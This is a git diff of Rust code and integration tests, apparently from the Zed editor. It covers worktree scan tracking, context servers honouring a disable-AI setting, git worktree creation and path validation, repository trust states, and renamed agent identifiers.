+ fn observe_worktree_scan_completion( + &mut self, + worktree: &Entity, + cx: &mut Context, + ) { + let await_scan = worktree.update(cx, |worktree, _cx| worktree.wait_for_snapshot(1)); + cx.spawn(async move |this, cx| { + await_scan.await.ok(); + this.update(cx, |this, cx| { + this.update_initial_scan_state(cx); + }) + .ok(); + anyhow::Ok(()) + }) + .detach(); } /// Iterates through all worktrees, including ones that don't appear in the project panel @@ -554,12 +610,22 @@ impl WorktreeStore { self.loading_worktrees .insert(abs_path.clone(), task.shared()); + + if visible && self.scanning_enabled { + *self.initial_scan_complete.0.borrow_mut() = false; + } } let task = self.loading_worktrees.get(&abs_path).unwrap().clone(); cx.spawn(async move |this, cx| { let result = task.await; - this.update(cx, |this, _| this.loading_worktrees.remove(&abs_path)) - .ok(); + this.update(cx, |this, cx| { + this.loading_worktrees.remove(&abs_path); + if !visible || !this.scanning_enabled || result.is_err() { + this.update_initial_scan_state(cx); + } + }) + .ok(); + match result { Ok(worktree) => { if !is_via_collab { @@ -578,6 +644,13 @@ impl WorktreeStore { ); }); } + + this.update(cx, |this, cx| { + if this.scanning_enabled && visible { + this.observe_worktree_scan_completion(&worktree, cx); + } + }) + .ok(); } Ok(worktree) } @@ -735,6 +808,11 @@ impl WorktreeStore { worktree::Event::DeletedEntry(id) => { cx.emit(WorktreeStoreEvent::WorktreeDeletedEntry(worktree_id, *id)) } + worktree::Event::Deleted => { + // The worktree root itself has been deleted (for single-file worktrees) + // The worktree will be removed via the observe_release callback + } + worktree::Event::UpdatedRootRepoCommonDir => {} } }) .detach(); @@ -768,9 +846,25 @@ impl WorktreeStore { false } }); + self.update_initial_scan_state(cx); self.send_project_updates(cx); } + pub fn worktree_for_main_worktree_path( + &self, + path: &Path, + cx: &App, + ) -> Option> { + self.visible_worktrees(cx).find(|worktree| { + let 
worktree = worktree.read(cx); + if let Some(common_dir) = worktree.root_repo_common_dir() { + common_dir.parent() == Some(path) + } else { + worktree.abs_path().as_ref() == path + } + }) + } + pub fn set_worktrees_reordered(&mut self, worktrees_reordered: bool) { self.worktrees_reordered = worktrees_reordered; } diff --git a/crates/project/tests/integration/context_server_store.rs b/crates/project/tests/integration/context_server_store.rs index 56bdaed41cd77b665d316491e051582c7ccc078a..5b68e11bb95a8b9178a8febf91849ba3a65f76e6 100644 --- a/crates/project/tests/integration/context_server_store.rs +++ b/crates/project/tests/integration/context_server_store.rs @@ -8,10 +8,11 @@ use project::context_server_store::*; use project::project_settings::ContextServerSettings; use project::worktree_store::WorktreeStore; use project::{ - FakeFs, Project, context_server_store::registry::ContextServerDescriptor, + DisableAiSettings, FakeFs, Project, context_server_store::registry::ContextServerDescriptor, project_settings::ProjectSettings, }; use serde_json::json; +use settings::settings_content::SaturatingBool; use settings::{ContextServerCommand, Settings, SettingsStore}; use std::sync::Arc; use std::{cell::RefCell, path::PathBuf, rc::Rc}; @@ -553,6 +554,116 @@ async fn test_context_server_enabled_disabled(cx: &mut TestAppContext) { } } +#[gpui::test] +async fn test_context_server_respects_disable_ai(cx: &mut TestAppContext) { + const SERVER_1_ID: &str = "mcp-1"; + + let server_1_id = ContextServerId(SERVER_1_ID.into()); + + // Set up SettingsStore with disable_ai: true in user settings BEFORE creating project + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + DisableAiSettings::register(cx); + // Set disable_ai via user settings (not override_global) so it persists through recompute_values + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |content| { + content.project.disable_ai = 
Some(SaturatingBool(true)); + }); + }); + }); + + // Now create the project (ContextServerStore will see disable_ai = true) + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/test"), json!({"code.rs": ""})).await; + let project = Project::test(fs.clone(), [path!("/test").as_ref()], cx).await; + + let executor = cx.executor(); + let store = project.read_with(cx, |project, _| project.context_server_store()); + store.update(cx, |store, _| { + store.set_context_server_factory(Box::new(move |id, _| { + Arc::new(ContextServer::new( + id.clone(), + Arc::new(create_fake_transport(id.0.to_string(), executor.clone())), + )) + })); + }); + + set_context_server_configuration( + vec![( + server_1_id.0.clone(), + settings::ContextServerSettingsContent::Stdio { + enabled: true, + remote: false, + command: ContextServerCommand { + path: "somebinary".into(), + args: vec!["arg".to_string()], + env: None, + timeout: None, + }, + }, + )], + cx, + ); + + cx.run_until_parked(); + + // Verify that no server started because AI is disabled + cx.update(|cx| { + assert_eq!( + store.read(cx).status_for_server(&server_1_id), + None, + "Server should not start when disable_ai is true" + ); + }); + + // Enable AI and verify server starts + { + let _server_events = assert_server_events( + &store, + vec![ + (server_1_id.clone(), ContextServerStatus::Starting), + (server_1_id.clone(), ContextServerStatus::Running), + ], + cx, + ); + cx.update(|cx| { + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |content| { + content.project.disable_ai = Some(SaturatingBool(false)); + }); + }); + }); + cx.run_until_parked(); + } + + // Disable AI again and verify server stops + { + let _server_events = assert_server_events( + &store, + vec![(server_1_id.clone(), ContextServerStatus::Stopped)], + cx, + ); + cx.update(|cx| { + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |content| { + content.project.disable_ai = 
Some(SaturatingBool(true)); + }); + }); + }); + cx.run_until_parked(); + } + + // Verify server is stopped + cx.update(|cx| { + assert_eq!( + store.read(cx).status_for_server(&server_1_id), + Some(ContextServerStatus::Stopped), + "Server should be stopped when disable_ai is true" + ); + }); +} + #[gpui::test] async fn test_server_ids_includes_disabled_servers(cx: &mut TestAppContext) { const ENABLED_SERVER_ID: &str = "enabled-server"; diff --git a/crates/project/tests/integration/debugger.rs b/crates/project/tests/integration/debugger.rs index 2a15f8bc55b611b3b2fbd23fb9ccb052cadac387..61bba78c74baec2e48b172043b3b504ccf32dba9 100644 --- a/crates/project/tests/integration/debugger.rs +++ b/crates/project/tests/integration/debugger.rs @@ -3,7 +3,7 @@ mod go_locator { use dap::{DapLocator, adapters::DebugAdapterName}; use gpui::TestAppContext; use project::debugger::locators::go::{DelveLaunchRequest, GoLocator}; - use task::{HideStrategy, RevealStrategy, RevealTarget, Shell, TaskTemplate}; + use task::{HideStrategy, RevealStrategy, RevealTarget, SaveStrategy, Shell, TaskTemplate}; #[gpui::test] async fn test_create_scenario_for_go_build(_: &mut TestAppContext) { let locator = GoLocator; @@ -22,6 +22,8 @@ mod go_locator { tags: vec![], show_summary: true, show_command: true, + save: SaveStrategy::default(), + hooks: Default::default(), }; let scenario = locator @@ -49,6 +51,8 @@ mod go_locator { tags: vec![], show_summary: true, show_command: true, + save: SaveStrategy::default(), + hooks: Default::default(), }; let scenario = locator @@ -187,6 +191,8 @@ mod go_locator { tags: vec![], show_summary: true, show_command: true, + save: SaveStrategy::default(), + hooks: Default::default(), }; let scenario = locator @@ -221,6 +227,8 @@ mod python_locator { shell: task::Shell::System, show_summary: false, show_command: false, + save: task::SaveStrategy::default(), + hooks: Default::default(), }; let expected_scenario = DebugScenario { diff --git 
a/crates/project/tests/integration/ext_agent_tests.rs b/crates/project/tests/integration/ext_agent_tests.rs index f3c398a619a81ee81146de16f8e58b1093569e8a..bd4acf2b3e9419b62ff676331383b48f98874345 100644 --- a/crates/project/tests/integration/ext_agent_tests.rs +++ b/crates/project/tests/integration/ext_agent_tests.rs @@ -10,7 +10,6 @@ impl ExternalAgentServer for NoopExternalAgent { fn get_command( &mut self, _extra_env: HashMap, - _status_tx: Option>, _new_version_available_tx: Option>>, _cx: &mut AsyncApp, ) -> Task> { @@ -21,6 +20,10 @@ impl ExternalAgentServer for NoopExternalAgent { })) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } @@ -28,7 +31,7 @@ impl ExternalAgentServer for NoopExternalAgent { #[test] fn external_agent_server_name_display() { - let name = ExternalAgentServerName(SharedString::from("Ext: Tool")); + let name = AgentId(SharedString::from("Ext: Tool")); let mut s = String::new(); write!(&mut s, "{name}").unwrap(); assert_eq!(s, "Ext: Tool"); @@ -40,7 +43,7 @@ fn sync_extension_agents_removes_previous_extension_entries() { // Seed with a couple of agents that will be replaced by extensions store.external_agents.insert( - ExternalAgentServerName(SharedString::from("foo-agent")), + AgentId(SharedString::from("foo-agent")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, ExternalAgentSource::Custom, @@ -49,7 +52,7 @@ fn sync_extension_agents_removes_previous_extension_entries() { ), ); store.external_agents.insert( - ExternalAgentServerName(SharedString::from("bar-agent")), + AgentId(SharedString::from("bar-agent")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, ExternalAgentSource::Custom, @@ -58,7 +61,7 @@ fn sync_extension_agents_removes_previous_extension_entries() { ), ); store.external_agents.insert( - ExternalAgentServerName(SharedString::from("custom")), + AgentId(SharedString::from("custom")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, 
ExternalAgentSource::Custom, diff --git a/crates/project/tests/integration/extension_agent_tests.rs b/crates/project/tests/integration/extension_agent_tests.rs index eff41a99cab878336206f232450f3c1b490d1fc8..577bc3b2901c52f4f47d9d0c82ef89fc66e2c21a 100644 --- a/crates/project/tests/integration/extension_agent_tests.rs +++ b/crates/project/tests/integration/extension_agent_tests.rs @@ -9,14 +9,14 @@ use std::{any::Any, path::PathBuf, sync::Arc}; #[test] fn extension_agent_constructs_proper_display_names() { // Verify the display name format for extension-provided agents - let name1 = ExternalAgentServerName(SharedString::from("Extension: Agent")); + let name1 = AgentId(SharedString::from("Extension: Agent")); assert!(name1.0.contains(": ")); - let name2 = ExternalAgentServerName(SharedString::from("MyExt: MyAgent")); + let name2 = AgentId(SharedString::from("MyExt: MyAgent")); assert_eq!(name2.0, "MyExt: MyAgent"); // Non-extension agents shouldn't have the separator - let custom = ExternalAgentServerName(SharedString::from("custom")); + let custom = AgentId(SharedString::from("custom")); assert!(!custom.0.contains(": ")); } @@ -26,7 +26,6 @@ impl ExternalAgentServer for NoopExternalAgent { fn get_command( &mut self, _extra_env: HashMap, - _status_tx: Option>, _new_version_available_tx: Option>>, _cx: &mut AsyncApp, ) -> Task> { @@ -37,6 +36,10 @@ impl ExternalAgentServer for NoopExternalAgent { })) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } @@ -48,7 +51,7 @@ fn sync_removes_only_extension_provided_agents() { // Seed with extension agents (contain ": ") and custom agents (don't contain ": ") store.external_agents.insert( - ExternalAgentServerName(SharedString::from("Ext1: Agent1")), + AgentId(SharedString::from("Ext1: Agent1")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, ExternalAgentSource::Extension, @@ -57,7 +60,7 @@ fn sync_removes_only_extension_provided_agents() { ), ); 
store.external_agents.insert( - ExternalAgentServerName(SharedString::from("Ext2: Agent2")), + AgentId(SharedString::from("Ext2: Agent2")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, ExternalAgentSource::Extension, @@ -66,7 +69,7 @@ fn sync_removes_only_extension_provided_agents() { ), ); store.external_agents.insert( - ExternalAgentServerName(SharedString::from("custom-agent")), + AgentId(SharedString::from("custom-agent")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, ExternalAgentSource::Custom, @@ -85,7 +88,7 @@ fn sync_removes_only_extension_provided_agents() { assert!( store .external_agents - .contains_key(&ExternalAgentServerName(SharedString::from("custom-agent"))) + .contains_key(&AgentId(SharedString::from("custom-agent"))) ); } @@ -118,7 +121,7 @@ fn archive_launcher_constructs_with_all_fields() { }; // Verify display name construction - let expected_name = ExternalAgentServerName(SharedString::from("GitHub Agent")); + let expected_name = AgentId(SharedString::from("GitHub Agent")); assert_eq!(expected_name.0, "GitHub Agent"); } @@ -139,6 +142,7 @@ async fn archive_agent_uses_extension_and_agent_id_for_cache_key(cx: &mut TestAp project_environment, extension_id: Arc::from("my-extension"), agent_id: Arc::from("my-agent"), + version: Some(SharedString::from("1.0.0")), targets: { let mut map = HashMap::default(); map.insert( @@ -158,6 +162,7 @@ async fn archive_agent_uses_extension_and_agent_id_for_cache_key(cx: &mut TestAp map.insert("PORT".into(), "8080".into()); map }, + new_version_available_tx: None, }; // Verify agent is properly constructed @@ -171,7 +176,7 @@ async fn archive_agent_uses_extension_and_agent_id_for_cache_key(cx: &mut TestAp fn sync_extension_agents_registers_archive_launcher() { use extension::AgentServerManifestEntry; - let expected_name = ExternalAgentServerName(SharedString::from("Release Agent")); + let expected_name = AgentId(SharedString::from("Release Agent")); assert_eq!(expected_name.0, 
"Release Agent"); // Verify the manifest entry structure for archive-based installation @@ -221,6 +226,7 @@ async fn test_node_command_uses_managed_runtime(cx: &mut TestAppContext) { project_environment, extension_id: Arc::from("node-extension"), agent_id: Arc::from("node-agent"), + version: Some(SharedString::from("1.0.0")), targets: { let mut map = HashMap::default(); map.insert( @@ -236,6 +242,7 @@ async fn test_node_command_uses_managed_runtime(cx: &mut TestAppContext) { map }, env: HashMap::default(), + new_version_available_tx: None, }; // Verify that when cmd is "node", it attempts to use the node runtime @@ -265,6 +272,7 @@ async fn test_commands_run_in_extraction_directory(cx: &mut TestAppContext) { project_environment, extension_id: Arc::from("test-ext"), agent_id: Arc::from("test-agent"), + version: Some(SharedString::from("1.0.0")), targets: { let mut map = HashMap::default(); map.insert( @@ -284,6 +292,7 @@ async fn test_commands_run_in_extraction_directory(cx: &mut TestAppContext) { map }, env: Default::default(), + new_version_available_tx: None, }; // Verify the agent is configured with relative paths in args diff --git a/crates/project/tests/integration/git_store.rs b/crates/project/tests/integration/git_store.rs index 43704953e0d0bd3e81b9b63b5a797934970dcafa..02f752b28b24a8135e2cba9307a5eacdc16f0fa3 100644 --- a/crates/project/tests/integration/git_store.rs +++ b/crates/project/tests/integration/git_store.rs @@ -336,7 +336,7 @@ mod conflict_set_tests { second_head: UnmergedStatusCode::Updated, }, ); - // Cause the repository to emit MergeHeadsChanged. 
+ // Cause the repository to update cached conflicts state.refs.insert("MERGE_HEAD".into(), "123".into()) }) .unwrap(); @@ -461,6 +461,168 @@ mod conflict_set_tests { assert_eq!(conflict_range, Point::new(1, 0)..Point::new(6, 0)); }); } + + #[gpui::test] + async fn test_conflict_updates_with_delayed_merge_head_conflicts( + executor: BackgroundExecutor, + cx: &mut TestAppContext, + ) { + zlog::init_test(); + cx.update(|cx| { + settings::init(cx); + }); + + let initial_text = " + one + two + three + four + " + .unindent(); + + let conflicted_text = " + one + <<<<<<< HEAD + two + ======= + TWO + >>>>>>> branch + three + four + " + .unindent(); + + let resolved_text = " + one + TWO + three + four + " + .unindent(); + + let fs = FakeFs::new(executor); + fs.insert_tree( + path!("/project"), + json!({ + ".git": {}, + "a.txt": initial_text, + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; + let (git_store, buffer) = project.update(cx, |project, cx| { + ( + project.git_store().clone(), + project.open_local_buffer(path!("/project/a.txt"), cx), + ) + }); + let buffer = buffer.await.unwrap(); + let conflict_set = git_store.update(cx, |git_store, cx| { + git_store.open_conflict_set(buffer.clone(), cx) + }); + + let (events_tx, events_rx) = mpsc::channel::(); + let _conflict_set_subscription = cx.update(|cx| { + cx.subscribe(&conflict_set, move |_, event, _| { + events_tx.send(event.clone()).ok(); + }) + }); + + cx.run_until_parked(); + events_rx + .try_recv() + .expect_err("conflict set should start empty"); + + fs.with_git_state(path!("/project/.git").as_ref(), true, |state| { + state.refs.insert("MERGE_HEAD".into(), "123".into()) + }) + .unwrap(); + + cx.run_until_parked(); + events_rx + .try_recv() + .expect_err("merge head without conflicted paths should not publish conflicts"); + conflict_set.update(cx, |conflict_set, _| { + assert!(!conflict_set.has_conflict); + assert_eq!(conflict_set.snapshot.conflicts.len(), 0); + 
}); + + buffer.update(cx, |buffer, cx| { + buffer.set_text(conflicted_text.clone(), cx); + }); + fs.with_git_state(path!("/project/.git").as_ref(), true, |state| { + state.unmerged_paths.insert( + repo_path("a.txt"), + UnmergedStatus { + first_head: UnmergedStatusCode::Updated, + second_head: UnmergedStatusCode::Updated, + }, + ); + }) + .unwrap(); + + cx.run_until_parked(); + let update = events_rx + .try_recv() + .expect("conflicts should appear once conflicted paths are visible"); + assert_eq!(update.old_range, 0..0); + assert_eq!(update.new_range, 0..1); + conflict_set.update(cx, |conflict_set, cx| { + assert!(conflict_set.has_conflict); + let conflict_range = conflict_set.snapshot().conflicts[0] + .range + .to_point(buffer.read(cx)); + assert_eq!(conflict_range, Point::new(1, 0)..Point::new(6, 0)); + }); + + buffer.update(cx, |buffer, cx| { + buffer.set_text(resolved_text.clone(), cx); + }); + + cx.run_until_parked(); + let update = events_rx + .try_recv() + .expect("resolved buffer text should clear visible conflict markers"); + assert_eq!(update.old_range, 0..1); + assert_eq!(update.new_range, 0..0); + conflict_set.update(cx, |conflict_set, _| { + assert!(conflict_set.has_conflict); + assert_eq!(conflict_set.snapshot.conflicts.len(), 0); + }); + + fs.with_git_state(path!("/project/.git").as_ref(), true, |state| { + state.refs.insert("MERGE_HEAD".into(), "456".into()); + }) + .unwrap(); + + cx.run_until_parked(); + events_rx.try_recv().expect_err( + "merge-head change without unmerged-path changes should not emit marker updates", + ); + conflict_set.update(cx, |conflict_set, _| { + assert!(conflict_set.has_conflict); + assert_eq!(conflict_set.snapshot.conflicts.len(), 0); + }); + + fs.with_git_state(path!("/project/.git").as_ref(), true, |state| { + state.unmerged_paths.remove(&repo_path("a.txt")); + state.refs.remove("MERGE_HEAD"); + }) + .unwrap(); + + cx.run_until_parked(); + let update = events_rx.try_recv().expect( + "status catch-up should emit a no-op 
update when clearing stale conflict state", + ); + assert_eq!(update.old_range, 0..0); + assert_eq!(update.new_range, 0..0); + assert!(update.buffer_range.is_none()); + conflict_set.update(cx, |conflict_set, _| { + assert!(!conflict_set.has_conflict); + assert_eq!(conflict_set.snapshot.conflicts.len(), 0); + }); + } } mod git_traversal { @@ -1012,3 +1174,477 @@ mod git_traversal { pretty_assertions::assert_eq!(found_statuses, expected_statuses); } } + +mod git_worktrees { + use fs::FakeFs; + use gpui::TestAppContext; + use project::worktrees_directory_for_repo; + use serde_json::json; + use settings::SettingsStore; + use std::path::{Path, PathBuf}; + use util::path; + fn init_test(cx: &mut gpui::TestAppContext) { + zlog::init_test(); + + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + }); + } + + #[test] + fn test_validate_worktree_directory() { + let work_dir = Path::new("/code/my-project"); + + // Valid: sibling + assert!(worktrees_directory_for_repo(work_dir, "../worktrees").is_ok()); + + // Valid: subdirectory + assert!(worktrees_directory_for_repo(work_dir, ".git/zed-worktrees").is_ok()); + assert!(worktrees_directory_for_repo(work_dir, "my-worktrees").is_ok()); + + // Invalid: just ".." would resolve back to the working directory itself + let err = worktrees_directory_for_repo(work_dir, "..").unwrap_err(); + assert!(err.to_string().contains("must not be \"..\"")); + + // Invalid: ".." 
with trailing separators + let err = worktrees_directory_for_repo(work_dir, "..\\").unwrap_err(); + assert!(err.to_string().contains("must not be \"..\"")); + let err = worktrees_directory_for_repo(work_dir, "../").unwrap_err(); + assert!(err.to_string().contains("must not be \"..\"")); + + // Invalid: empty string would resolve to the working directory itself + let err = worktrees_directory_for_repo(work_dir, "").unwrap_err(); + assert!(err.to_string().contains("must not be empty")); + + // Invalid: absolute path + let err = worktrees_directory_for_repo(work_dir, "/tmp/worktrees").unwrap_err(); + assert!(err.to_string().contains("relative path")); + + // Invalid: "/" is absolute on Unix + let err = worktrees_directory_for_repo(work_dir, "/").unwrap_err(); + assert!(err.to_string().contains("relative path")); + + // Invalid: "///" is absolute + let err = worktrees_directory_for_repo(work_dir, "///").unwrap_err(); + assert!(err.to_string().contains("relative path")); + + // Invalid: escapes too far up + let err = worktrees_directory_for_repo(work_dir, "../../other-project/wt").unwrap_err(); + assert!(err.to_string().contains("outside")); + } + + #[gpui::test] + async fn test_git_worktrees_list_and_create(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/root"), + json!({ + ".git": {}, + "file.txt": "content", + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; + cx.executor().run_until_parked(); + + let repository = project.read_with(cx, |project, cx| { + project.repositories(cx).values().next().unwrap().clone() + }); + + let worktrees = cx + .update(|cx| repository.update(cx, |repository, _| repository.worktrees())) + .await + .unwrap() + .unwrap(); + assert_eq!(worktrees.len(), 1); + assert_eq!(worktrees[0].path, PathBuf::from(path!("/root"))); + + let worktrees_directory = PathBuf::from(path!("/root")); + let worktree_1_directory = 
worktrees_directory.join("feature-branch"); + cx.update(|cx| { + repository.update(cx, |repository, _| { + repository.create_worktree( + "feature-branch".to_string(), + worktree_1_directory.clone(), + Some("abc123".to_string()), + ) + }) + }) + .await + .unwrap() + .unwrap(); + + cx.executor().run_until_parked(); + + let worktrees = cx + .update(|cx| repository.update(cx, |repository, _| repository.worktrees())) + .await + .unwrap() + .unwrap(); + assert_eq!(worktrees.len(), 2); + assert_eq!(worktrees[0].path, PathBuf::from(path!("/root"))); + assert_eq!(worktrees[1].path, worktree_1_directory); + assert_eq!( + worktrees[1].ref_name, + Some("refs/heads/feature-branch".into()) + ); + assert_eq!(worktrees[1].sha.as_ref(), "abc123"); + + let worktree_2_directory = worktrees_directory.join("bugfix-branch"); + cx.update(|cx| { + repository.update(cx, |repository, _| { + repository.create_worktree( + "bugfix-branch".to_string(), + worktree_2_directory.clone(), + None, + ) + }) + }) + .await + .unwrap() + .unwrap(); + + cx.executor().run_until_parked(); + + // List worktrees — should now have main + two created + let worktrees = cx + .update(|cx| repository.update(cx, |repository, _| repository.worktrees())) + .await + .unwrap() + .unwrap(); + assert_eq!(worktrees.len(), 3); + + let worktree_1 = worktrees + .iter() + .find(|worktree| worktree.ref_name == Some("refs/heads/feature-branch".into())) + .expect("should find feature-branch worktree"); + assert_eq!(worktree_1.path, worktree_1_directory); + + let worktree_2 = worktrees + .iter() + .find(|worktree| worktree.ref_name == Some("refs/heads/bugfix-branch".into())) + .expect("should find bugfix-branch worktree"); + assert_eq!(worktree_2.path, worktree_2_directory); + assert_eq!(worktree_2.sha.as_ref(), "fake-sha"); + } + + use crate::Project; +} + +mod trust_tests { + use collections::HashSet; + use fs::FakeFs; + use gpui::TestAppContext; + use project::trusted_worktrees::*; + + use serde_json::json; + use 
settings::SettingsStore; + use util::path; + + use crate::Project; + + fn init_test(cx: &mut TestAppContext) { + zlog::init_test(); + + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + }); + } + + #[gpui::test] + async fn test_repository_defaults_to_untrusted_without_trust_system(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/project"), + json!({ + ".git": {}, + "a.txt": "hello", + }), + ) + .await; + + // Create project without trust system — repos should default to untrusted. + let project = Project::test(fs, [path!("/project").as_ref()], cx).await; + cx.executor().run_until_parked(); + + let repository = project.read_with(cx, |project, cx| { + project.repositories(cx).values().next().unwrap().clone() + }); + + repository.read_with(cx, |repo, _| { + assert!( + !repo.is_trusted(), + "repository should default to untrusted when no trust system is initialized" + ); + }); + } + + #[gpui::test] + async fn test_multiple_repos_trust_with_single_worktree(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/project"), + json!({ + ".git": {}, + "a.txt": "hello", + "sub": { + ".git": {}, + "b.txt": "world", + }, + }), + ) + .await; + + cx.update(|cx| { + init(DbTrustedPaths::default(), cx); + }); + + let project = + Project::test_with_worktree_trust(fs.clone(), [path!("/project").as_ref()], cx).await; + cx.executor().run_until_parked(); + + let worktree_store = project.read_with(cx, |project, _| project.worktree_store()); + let worktree_id = worktree_store.read_with(cx, |store, cx| { + store.worktrees().next().unwrap().read(cx).id() + }); + + let repos = project.read_with(cx, |project, cx| { + project + .repositories(cx) + .values() + .cloned() + .collect::>() + }); + assert_eq!(repos.len(), 2, "should have two repositories"); + for repo in &repos { + repo.read_with(cx, 
|repo, _| { + assert!( + !repo.is_trusted(), + "all repos should be untrusted initially" + ); + }); + } + + let trusted_worktrees = cx + .update(|cx| TrustedWorktrees::try_get_global(cx).expect("trust global should be set")); + trusted_worktrees.update(cx, |store, cx| { + store.trust( + &worktree_store, + HashSet::from_iter([PathTrust::Worktree(worktree_id)]), + cx, + ); + }); + cx.executor().run_until_parked(); + + for repo in &repos { + repo.read_with(cx, |repo, _| { + assert!( + repo.is_trusted(), + "all repos should be trusted after worktree is trusted" + ); + }); + } + } + + #[gpui::test] + async fn test_repository_trust_restrict_trust_cycle(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/project"), + json!({ + ".git": {}, + "a.txt": "hello", + }), + ) + .await; + + cx.update(|cx| { + project::trusted_worktrees::init(DbTrustedPaths::default(), cx); + }); + + let project = + Project::test_with_worktree_trust(fs.clone(), [path!("/project").as_ref()], cx).await; + cx.executor().run_until_parked(); + + let worktree_store = project.read_with(cx, |project, _| project.worktree_store()); + let worktree_id = worktree_store.read_with(cx, |store, cx| { + store.worktrees().next().unwrap().read(cx).id() + }); + + let repository = project.read_with(cx, |project, cx| { + project.repositories(cx).values().next().unwrap().clone() + }); + + repository.read_with(cx, |repo, _| { + assert!(!repo.is_trusted(), "repository should start untrusted"); + }); + + let trusted_worktrees = cx + .update(|cx| TrustedWorktrees::try_get_global(cx).expect("trust global should be set")); + + trusted_worktrees.update(cx, |store, cx| { + store.trust( + &worktree_store, + HashSet::from_iter([PathTrust::Worktree(worktree_id)]), + cx, + ); + }); + cx.executor().run_until_parked(); + + repository.read_with(cx, |repo, _| { + assert!( + repo.is_trusted(), + "repository should be trusted after worktree is trusted" + ); + }); + 
+ trusted_worktrees.update(cx, |store, cx| { + store.restrict( + worktree_store.downgrade(), + HashSet::from_iter([PathTrust::Worktree(worktree_id)]), + cx, + ); + }); + cx.executor().run_until_parked(); + + repository.read_with(cx, |repo, _| { + assert!( + !repo.is_trusted(), + "repository should be untrusted after worktree is restricted" + ); + }); + + trusted_worktrees.update(cx, |store, cx| { + store.trust( + &worktree_store, + HashSet::from_iter([PathTrust::Worktree(worktree_id)]), + cx, + ); + }); + cx.executor().run_until_parked(); + + repository.read_with(cx, |repo, _| { + assert!( + repo.is_trusted(), + "repository should be trusted again after second trust" + ); + }); + } +} + +mod resolve_worktree_tests { + use fs::FakeFs; + use gpui::TestAppContext; + use project::{git_store::resolve_git_worktree_to_main_repo, linked_worktree_short_name}; + use serde_json::json; + use std::path::{Path, PathBuf}; + + #[gpui::test] + async fn test_resolve_git_worktree_to_main_repo(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + // Set up a main repo with a worktree entry + fs.insert_tree( + "/main-repo", + json!({ + ".git": { + "worktrees": { + "feature": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + // Set up a worktree checkout pointing back to the main repo + fs.insert_tree( + "/worktree-checkout", + json!({ + ".git": "gitdir: /main-repo/.git/worktrees/feature", + "src": { "main.rs": "" } + }), + ) + .await; + + let result = + resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/worktree-checkout")).await; + assert_eq!(result, Some(PathBuf::from("/main-repo"))); + } + + #[gpui::test] + async fn test_resolve_git_worktree_normal_repo_returns_none(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/repo", + json!({ + ".git": {}, + "src": { "main.rs": "" } + }), + ) + .await; + + let result = 
resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/repo")).await; + assert_eq!(result, None); + } + + #[gpui::test] + async fn test_resolve_git_worktree_no_git_returns_none(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/plain", + json!({ + "src": { "main.rs": "" } + }), + ) + .await; + + let result = resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/plain")).await; + assert_eq!(result, None); + } + + #[gpui::test] + async fn test_resolve_git_worktree_nonexistent_returns_none(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + + let result = + resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/does-not-exist")).await; + assert_eq!(result, None); + } + + #[test] + fn test_linked_worktree_short_name() { + let examples = [ + ( + "/home/bob/zed", + "/home/bob/worktrees/olivetti/zed", + Some("olivetti".into()), + ), + ("/home/bob/zed", "/home/bob/zed2", Some("zed2".into())), + ( + "/home/bob/zed", + "/home/bob/worktrees/zed/selectric", + Some("selectric".into()), + ), + ("/home/bob/zed", "/home/bob/zed", None), + ]; + for (main_worktree_path, linked_worktree_path, expected) in examples { + let short_name = linked_worktree_short_name( + Path::new(main_worktree_path), + Path::new(linked_worktree_path), + ); + assert_eq!( + short_name, expected, + "short name for {linked_worktree_path:?}, linked worktree of {main_worktree_path:?}, should be {expected:?}" + ); + } + } +} diff --git a/crates/project/tests/integration/lsp_store.rs b/crates/project/tests/integration/lsp_store.rs index 91d5ca1697255a07c0bc9bb37869d87773792297..7d266ff1365485032458d6de033b57f106602869 100644 --- a/crates/project/tests/integration/lsp_store.rs +++ b/crates/project/tests/integration/lsp_store.rs @@ -43,7 +43,7 @@ fn test_multi_len_chars_normalization() { let mut label = CodeLabel::new( "myElˇ (parameter) myElˇ: {\n foo: string;\n}".to_string(), 0..6, - vec![(0..6, HighlightId(1))], + vec![(0..6, HighlightId::new(1))], 
